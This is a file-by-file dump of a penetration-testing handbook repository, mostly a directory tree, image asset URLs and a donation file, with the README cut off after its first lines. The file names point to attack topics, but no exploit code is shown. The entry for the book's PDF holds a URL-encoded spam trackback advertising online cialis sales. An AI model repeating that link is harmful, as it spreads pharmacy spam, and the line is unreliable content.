├── .gitbook └── assets │ ├── 20200520131941-1-.jpg │ ├── 20200520131941[1].jpg │ ├── AzureADvsAD[1].png │ ├── E4L0FUtUcAUbI6k.jpeg │ ├── MFA.png │ ├── Methodology[1].png │ ├── Untitled diagram-2025-03-14-131837.png │ ├── XSS2.png │ ├── assessment-mindset (1) (1) (1).png │ ├── assessment-mindset (1) (1).png │ ├── assessment-mindset (1).png │ ├── assessment-mindset.png │ ├── azureadvsad-1-.png │ ├── bmc-coffee.gif │ ├── e4l0futucaubi6k.jpeg │ ├── image (1) (1).png │ ├── image (1).png │ ├── image (10).png │ ├── image (11).png │ ├── image (12).png │ ├── image (13).png │ ├── image (14).png │ ├── image (15).png │ ├── image (16).png │ ├── image (17).png │ ├── image (18).png │ ├── image (19).png │ ├── image (2).png │ ├── image (20).png │ ├── image (21).png │ ├── image (22).png │ ├── image (23).png │ ├── image (24).png │ ├── image (25).png │ ├── image (26).png │ ├── image (27).png │ ├── image (28).png │ ├── image (29).png │ ├── image (3).png │ ├── image (30).png │ ├── image (31).png │ ├── image (32).png │ ├── image (33).png │ ├── image (34).png │ ├── image (35).png │ ├── image (36).png │ ├── image (37).png │ ├── image (38).png │ ├── image (39).png │ ├── image (4).png │ ├── image (40).png │ ├── image (41).png │ ├── image (42).png │ ├── image (43).png │ ├── image (44).png │ ├── image (45).png │ ├── image (46).png │ ├── image (47).png │ ├── image (48).png │ ├── image (49).png │ ├── image (5).png │ ├── image (50).png │ ├── image (51).png │ ├── image (6).png │ ├── image (7).png │ ├── image (8).png │ ├── image (9).png │ ├── image.png │ ├── imagen (1).png │ ├── imagen (10).png │ ├── imagen (11).png │ ├── imagen (12).png │ ├── imagen (13).png │ ├── imagen (14).png │ ├── imagen (15).png │ ├── imagen (16).png │ ├── imagen (17).png │ ├── imagen (18).png │ ├── imagen (19).png │ ├── imagen (2).png │ ├── imagen (20).png │ ├── imagen (21).png │ ├── imagen (23) (1).png │ ├── imagen (23).png │ ├── imagen (3).png │ ├── imagen (4).png │ ├── imagen (5).png │ ├── imagen (6).png │ ├── imagen (7) (1).png │ ├── imagen (7).png │ ├── imagen (8).png │ ├── imagen (9).png │ ├── imagen.png │ ├── methodology-1-.png │ ├── mfa.png │ ├── pentest_ad-min.png │ ├── pentest_ad.png │ ├── photo_2020-06-08_07-24-17.jpg │ ├── six2dez-gitbook_v1.pdf │ ├── xss2.png │ ├── y7ipicwvp5d41-1-.png │ └── y7ipicwvp5d41[1].png ├── .github └── FUNDING.yml ├── README.md ├── SUMMARY.md ├── _config.yml ├── enumeration ├── cloud │ ├── README.md │ ├── aws.md │ ├── azure.md │ ├── cdn-comain-fronting.md │ ├── cloud-info-recon.md │ ├── docker-and-and-kubernetes.md │ ├── gcp.md │ └── general.md ├── files.md ├── ports.md ├── ssl-tls.md ├── web │ ├── README.md │ ├── broken-links.md │ ├── bruteforcing.md │ ├── clickjacking.md │ ├── command-injection.md │ ├── cookie-padding.md │ ├── cors.md │ ├── crawl-fuzz.md │ ├── crlf.md │ ├── csp.md │ ├── csrf.md │ ├── deserialization.md │ ├── dns-rebinding.md │ ├── email-attacks.md │ ├── general-info.md │ ├── header-injections.md │ ├── idor.md │ ├── lfi-rfi.md │ ├── online-hashes-cracked.md │ ├── open-redirect.md │ ├── open-redirects.md │ ├── parameter-pollution.md │ ├── pastejacking.md │ ├── prototype-pollution.md │ ├── quick-tricks.md │ ├── request-smuggling.md │ ├── session-fixation.md │ ├── sqli.md │ ├── ssrf.md │ ├── ssti.md │ ├── tabnabbing.md │ ├── upload-bypasses.md │ ├── vhosts.md │ ├── web-cache-deception.md │ ├── web-cache-poisoning.md │ ├── web-shells.md │ ├── web-sockets.md │ ├── xss.md │ └── xxe.md └── webservices │ ├── .net.md │ ├── 2fa.md │ ├── README.md │ ├── adobe-aem.md │ ├── apis.md │ ├── drupal.md │ ├── elk.md │ ├── firebase.md │ ├── firebird.md │ ├── flash-swf.md │ ├── flask.md │ ├── github.md │ ├── gitlab.md │ ├── graphql.md │ ├── gwt.md │ ├── iis.md │ ├── jboss-java-deserialization.md │ ├── jenkins.md │ ├── jira.md │ ├── joomla.md │ ├── js.md │ ├── jwt.md │ ├── magento.md │ ├── mfa.md │ ├── nginx.md │ ├── nosql-and-and-mongodb.md │ ├── oauth.md │ ├── oidc-open-id-connect.md │ ├── onelogin-saml-login.md │ ├── others.md │ ├── owa.md │ ├── php.md │ ├── python.md │ ├── ror-ruby-on-rails.md │ ├── sap.md │ ├── sharepoint.md │ ├── symfony-and-and-twig.md │ ├── tomcat.md │ ├── vhosts.md │ ├── wafs.md │ ├── webdav.md │ └── wordpress.md ├── exploitation ├── file-transfer.md ├── payloads.md └── reverse-shells.md ├── img ├── assessment-mindset (1) (1).png ├── assessment-mindset (1).png ├── assessment-mindset.png ├── bmc-coffee.gif └── image.png ├── index.md ├── mobile ├── android.md ├── general.md └── ios.md ├── others ├── bugbounty.md ├── burp.md ├── code-review.md ├── dictionaries.md ├── exploiting.md ├── internal-pentest.md ├── llm-ai-ml-prompt-testing.md ├── master-assessment-mindmap.md ├── password-cracking.md ├── recon-suites-review.md ├── subdomain-tools-review.md ├── tools-everywhere.md ├── virtualbox.md ├── web-checklist.md └── web-fuzzers-comparision.md ├── post-exploitation ├── linux.md ├── pivoting.md └── windows │ ├── README.md │ ├── ad.md │ ├── ad │ ├── README.md │ └── kerberos-attacks.md │ ├── kerberos-attacks.md │ └── ps-tips-and-tricks.md ├── recon ├── domain-enum.md ├── host-scanning.md ├── network-scanning.md ├── packet-scanning.md ├── public-info-gathering.md ├── subdomain-enum │ ├── README.md │ └── subdomain-takeover.md └── webs-recon.md └── sections ├── enum ├── README.md ├── cloud.md ├── files.md ├── ports.md └── web │ ├── README.md │ └── webservices.md ├── exploitation.md ├── mobile.md ├── others.md ├── post.md └── recon.md /.gitbook/assets/20200520131941-1-.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/20200520131941-1-.jpg -------------------------------------------------------------------------------- /.gitbook/assets/20200520131941[1].jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/20200520131941[1].jpg -------------------------------------------------------------------------------- /.gitbook/assets/AzureADvsAD[1].png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/AzureADvsAD[1].png -------------------------------------------------------------------------------- /.gitbook/assets/E4L0FUtUcAUbI6k.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/E4L0FUtUcAUbI6k.jpeg -------------------------------------------------------------------------------- /.gitbook/assets/MFA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/MFA.png -------------------------------------------------------------------------------- /.gitbook/assets/Methodology[1].png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/Methodology[1].png -------------------------------------------------------------------------------- /.gitbook/assets/Untitled diagram-2025-03-14-131837.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/Untitled diagram-2025-03-14-131837.png -------------------------------------------------------------------------------- /.gitbook/assets/XSS2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/XSS2.png -------------------------------------------------------------------------------- /.gitbook/assets/assessment-mindset (1) (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/assessment-mindset (1) (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/assessment-mindset (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/assessment-mindset (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/assessment-mindset (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/assessment-mindset (1).png -------------------------------------------------------------------------------- /.gitbook/assets/assessment-mindset.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/assessment-mindset.png -------------------------------------------------------------------------------- /.gitbook/assets/azureadvsad-1-.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/azureadvsad-1-.png -------------------------------------------------------------------------------- /.gitbook/assets/bmc-coffee.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/bmc-coffee.gif -------------------------------------------------------------------------------- /.gitbook/assets/e4l0futucaubi6k.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/e4l0futucaubi6k.jpeg -------------------------------------------------------------------------------- /.gitbook/assets/image (1) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (1) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (10).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (10).png -------------------------------------------------------------------------------- /.gitbook/assets/image (11).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (11).png -------------------------------------------------------------------------------- /.gitbook/assets/image (12).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (12).png -------------------------------------------------------------------------------- /.gitbook/assets/image (13).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (13).png -------------------------------------------------------------------------------- /.gitbook/assets/image (14).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (14).png -------------------------------------------------------------------------------- /.gitbook/assets/image (15).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (15).png -------------------------------------------------------------------------------- /.gitbook/assets/image (16).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (16).png -------------------------------------------------------------------------------- /.gitbook/assets/image (17).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (17).png -------------------------------------------------------------------------------- /.gitbook/assets/image (18).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (18).png -------------------------------------------------------------------------------- /.gitbook/assets/image (19).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (19).png -------------------------------------------------------------------------------- /.gitbook/assets/image (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (20).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (20).png -------------------------------------------------------------------------------- /.gitbook/assets/image (21).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (21).png -------------------------------------------------------------------------------- /.gitbook/assets/image (22).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (22).png -------------------------------------------------------------------------------- /.gitbook/assets/image (23).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (23).png -------------------------------------------------------------------------------- /.gitbook/assets/image (24).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (24).png -------------------------------------------------------------------------------- /.gitbook/assets/image (25).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (25).png -------------------------------------------------------------------------------- /.gitbook/assets/image (26).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (26).png -------------------------------------------------------------------------------- /.gitbook/assets/image (27).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (27).png -------------------------------------------------------------------------------- /.gitbook/assets/image (28).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (28).png -------------------------------------------------------------------------------- /.gitbook/assets/image (29).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (29).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (30).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (30).png -------------------------------------------------------------------------------- /.gitbook/assets/image (31).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (31).png -------------------------------------------------------------------------------- /.gitbook/assets/image (32).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (32).png -------------------------------------------------------------------------------- /.gitbook/assets/image (33).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (33).png -------------------------------------------------------------------------------- /.gitbook/assets/image (34).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (34).png -------------------------------------------------------------------------------- /.gitbook/assets/image (35).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (35).png -------------------------------------------------------------------------------- /.gitbook/assets/image (36).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (36).png -------------------------------------------------------------------------------- /.gitbook/assets/image (37).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (37).png -------------------------------------------------------------------------------- /.gitbook/assets/image (38).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (38).png -------------------------------------------------------------------------------- /.gitbook/assets/image (39).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (39).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (40).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (40).png -------------------------------------------------------------------------------- /.gitbook/assets/image (41).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (41).png -------------------------------------------------------------------------------- /.gitbook/assets/image (42).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (42).png -------------------------------------------------------------------------------- /.gitbook/assets/image (43).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (43).png -------------------------------------------------------------------------------- /.gitbook/assets/image (44).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (44).png -------------------------------------------------------------------------------- /.gitbook/assets/image (45).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (45).png -------------------------------------------------------------------------------- /.gitbook/assets/image (46).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (46).png -------------------------------------------------------------------------------- /.gitbook/assets/image (47).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (47).png -------------------------------------------------------------------------------- /.gitbook/assets/image (48).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (48).png -------------------------------------------------------------------------------- /.gitbook/assets/image (49).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (49).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (5).png -------------------------------------------------------------------------------- /.gitbook/assets/image (50).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (50).png -------------------------------------------------------------------------------- /.gitbook/assets/image (51).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (51).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (6).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (7).png -------------------------------------------------------------------------------- /.gitbook/assets/image (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (8).png -------------------------------------------------------------------------------- /.gitbook/assets/image (9).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image (9).png -------------------------------------------------------------------------------- /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/image.png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (1).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (10).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (10).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (11).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (11).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (12).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (12).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (13).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (13).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (14).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (14).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (15).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (15).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (16).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (16).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (17).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (17).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (18).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (18).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (19).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (19).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (2).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (20).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (20).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (21).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (21).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (23) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (23) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (23).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (23).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (3).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (4).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (5).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (6).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (6).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (7) (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (7) (1).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (7).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (8).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen (9).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen (9).png -------------------------------------------------------------------------------- /.gitbook/assets/imagen.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/imagen.png -------------------------------------------------------------------------------- /.gitbook/assets/methodology-1-.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/methodology-1-.png -------------------------------------------------------------------------------- /.gitbook/assets/mfa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/mfa.png -------------------------------------------------------------------------------- /.gitbook/assets/pentest_ad-min.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/pentest_ad-min.png -------------------------------------------------------------------------------- /.gitbook/assets/pentest_ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/pentest_ad.png -------------------------------------------------------------------------------- /.gitbook/assets/photo_2020-06-08_07-24-17.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/photo_2020-06-08_07-24-17.jpg -------------------------------------------------------------------------------- /.gitbook/assets/six2dez-gitbook_v1.pdf: -------------------------------------------------------------------------------- 1 | url=https%3A%2F%2Fcialusorg.com&title=cialis%20online%20daily&blog_name=cialis%20online%20daily&excerpt=USA%20delivery -------------------------------------------------------------------------------- /.gitbook/assets/xss2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/xss2.png -------------------------------------------------------------------------------- /.gitbook/assets/y7ipicwvp5d41-1-.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/y7ipicwvp5d41-1-.png -------------------------------------------------------------------------------- /.gitbook/assets/y7ipicwvp5d41[1].png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/six2dez/pentest-book/716abed6f12d798df0f13db5b8cf12bf3cd56919/.gitbook/assets/y7ipicwvp5d41[1].png -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: six2dez 2 | custom: ["buymeacoffee.com/six2dez","https://www.blockchain.com/btc/address/bc1qtpjy68ls0nhwj9aveqkqthzrryp6cewh5p9sdr","https://www.paypal.com/paypalme/six2dez"] 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | This book contains a 